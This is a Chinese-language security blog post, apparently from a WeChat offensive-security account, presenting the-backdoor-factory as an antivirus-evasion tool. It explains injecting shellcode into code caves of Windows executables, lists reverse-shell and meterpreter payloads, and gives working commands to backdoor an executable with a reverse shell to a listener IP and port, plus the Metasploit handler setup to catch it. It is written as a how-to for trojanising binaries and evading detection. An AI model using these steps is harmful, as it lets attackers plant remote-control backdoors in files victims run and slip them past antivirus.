【免杀利器】the-backdoor-factory

0day几时有，把酒问青天。祝大家中秋快乐~

/*

本文参考至亮神的工具介绍-the-backdoor-factory

https://github.com/Micropoor/Micro8

将复现中一些小坑填满

*/

原理：可执行二进制文件中有大量的00，这些00是不包含数据的，将这些数据替换成 payload，并且在程序执行的时候，jmp到代码段，来触发payload。

【第一个坑】

backdoor-factory 在kali linux里面是自带的，但是在我们运行的时候就会不知道什么原因报错

解决的方法是重新从官网git clone一次

git clone https://github.com/secretsquirrel/the-backdoor-factory

【第二个坑】

缺少库

apt-get install python-capstone

此时就可以正常运行了

可用payload如下：

·cave_miner_inline
·iat_reverse_tcp_inline
·iat_reverse_tcp_inline_threaded
·iat_reverse_tcp_stager_threaded
·iat_user_supplied_shellcode_threaded
·meterpreter_reverse_https_threaded
·reverse_shell_tcp_inline
·reverse_tcp_stager_threaded
·user_supplied_shellcode_threaded

名称解析：

cave_miner_inline:

作为payload模板，长度为135，仅实现了控制流程跳转，不做其他操作，可用作自定义开发shellcode的模板

反汇编的payload格式

reverse_shell_tcp_inline：

对应meterpreter server：

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp

meterpreter_reverse_https_threaded：

对应meterpreter server：

use exploit/multi/handlerset payload windows/meterpreter/reverse_https

iat_reverse_tcp_inline中的iat：

iat为Import Address Table(导入地址表)的缩写，如果PE文件的IAT不包含API LoadLibraryA和GetProcAddress，直接执行payload reverse_shell_tcp_inline会失败，iat_reverse_tcp_inline增加了修复IAT的功能，避免执行失败

user_supplied_shellcode_threaded：

自定义payload，payload可通过msf生成

./backdoor.py -f /root/cve-2019-0708.exe -s  

reverse_shell_tcp_inline -H 192.168.50.130 

-P 4444

再这里选择你要选择的选项，最终就会自动生成在

/backdoored/ 目录下

//选择不同的Available caves会呈现出不同的免杀效果！！！

接下来就是设置msf 等待上线了

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.15.135

set lport 4444

exploit

看一下免杀效果

参考文献:

https://www.4hou.com/technology/8204.html

https://github.com/Micropoor/Micro8/blob/master/%E5%B7%A5%E5%85%B7%E4%BB%8B%E7%BB%8D-the-backdoor-factory%EF%BC%88%E7%AC%AC%E4%B9%9D%E8%AF%BE%EF%BC%89.pdf

本文始发于微信公众号（零组攻防实验室）：【免杀利器】the-backdoor-factory